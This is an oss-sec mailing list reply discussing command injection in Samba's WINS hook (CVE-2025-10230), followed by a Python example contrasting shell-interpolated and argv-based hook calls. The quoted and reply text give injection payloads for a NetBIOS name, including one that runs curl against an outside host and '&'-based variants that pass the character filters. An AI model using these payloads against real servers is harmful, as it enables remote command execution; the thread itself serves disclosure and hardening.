oss-sec mailing list archives

Re: Samba security releases for CVE-2025-10230 and CVE-2025-9640


From: Douglas Bagnall <douglas.bagnall () catalyst net nz>
Date: Thu, 16 Oct 2025 13:39:57 +1300

On 16/10/25 12:30, Caveney, Seamus G wrote:

> Illegal characters in a NetBIOS hostname are:
>
> \ / : * ? " < > | ,
>
> notably excluding backticks and semicolons. I'm not deeply familiar
> with the Samba code base but a glance at nbtname.c and winsserver.c
> seems to suggest that those character limitations aren't enforced at
> the protocol level, so it might be possible to use pipes, redirects
> or exec a local binary with a short path. Otherwise, the easiest
> exploitable payload I can think of would be:
>
> ;`curl ab.cd`;

The characters '<', ';', and '>' are blocked by the needs of the ldb
database that this server uses (I am not sure I checked '`', but it is
probably allowed). But of course '&' works just as well as ';'.

If '>' worked, I think you could build up a script with a lot of
"&echo foo>>x&" followed by a `tr`.

> I'd be interested to see if anybody has a living Samba install
> configured as a DC with WINS still running in 2025.

Me too!

The last indication of a 'wins hook' line I have seen was in 2016, and that was commented out.

An example of a place that may use it is a factory where some machinery is a few decades old and only knows WINS but otherwise still works well.

cheers,
Douglas
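An added illustration of the point argued above (this is example code written for this page, not Samba's code, and the hook/command names are assumed): the NetBIOS character list and the ldb-rejected character set from the thread are checked against the payloads discussed, showing that ';'-based payloads are stopped while '&'-based ones are not, and the underlying injection class is shown as a hostname interpolated into a shell command line versus passed as a separate argv element. Hypothetical "hook" is just /bin/echo so the example runs offline.

```python
"""Added example, not part of the original thread or of Samba.

Shows (1) which of the payloads discussed survive the character rules the
thread mentions, and (2) why passing a hostname through a shell is the
actual problem, regardless of those rules. The hook command is 'echo' here
so nothing harmful runs; everything is constructed for the illustration.
"""
import subprocess

# Characters the thread lists as illegal in a NetBIOS hostname.
NETBIOS_ILLEGAL = set('\\/:*?"<>|,')
# Characters the reply says the ldb database rejects ('`' assumed allowed).
LDB_REJECTED = set('<;>')


def passes_filters(name: str) -> bool:
    """True if NAME contains none of the characters either rule set blocks."""
    return not (set(name) & (NETBIOS_ILLEGAL | LDB_REJECTED))


def unsafe_hook(hook: str, name: str) -> str:
    """Vulnerable pattern (assumed, generic): the name is interpolated into a
    command string handed to /bin/sh, so '&', '`', '|' etc. are interpreted."""
    cmd = f"{hook} add {name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def safe_hook(hook: str, name: str) -> str:
    """Hardened pattern: argv list and no shell, so the name is one literal
    argument no matter which characters it contains."""
    return subprocess.run([hook, "add", name], capture_output=True, text=True).stdout


def injected(output: str) -> bool:
    """The marker appears as its own line only if the injected echo ran."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    for payload in (";`curl ab.cd`;", "&curl ab.cd&", "&echo foo>>x&"):
        print(f"{payload!r}: passes filters = {passes_filters(payload)}")
    name = "&echo INJECTED&"  # constructed payload in the style of the thread
    print("unsafe:", repr(unsafe_hook("echo", name)), "injected =", injected(unsafe_hook("echo", name)))
    print("safe:  ", repr(safe_hook("echo", name)), "injected =", injected(safe_hook("echo", name)))
```

The filter results follow the thread exactly: the ';' and '>' payloads are rejected, the '&' payload is not. The second half is the part that matters for a fix: the argv form prints the payload back verbatim, while the shell form runs the injected command even though the name passed every character filter.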

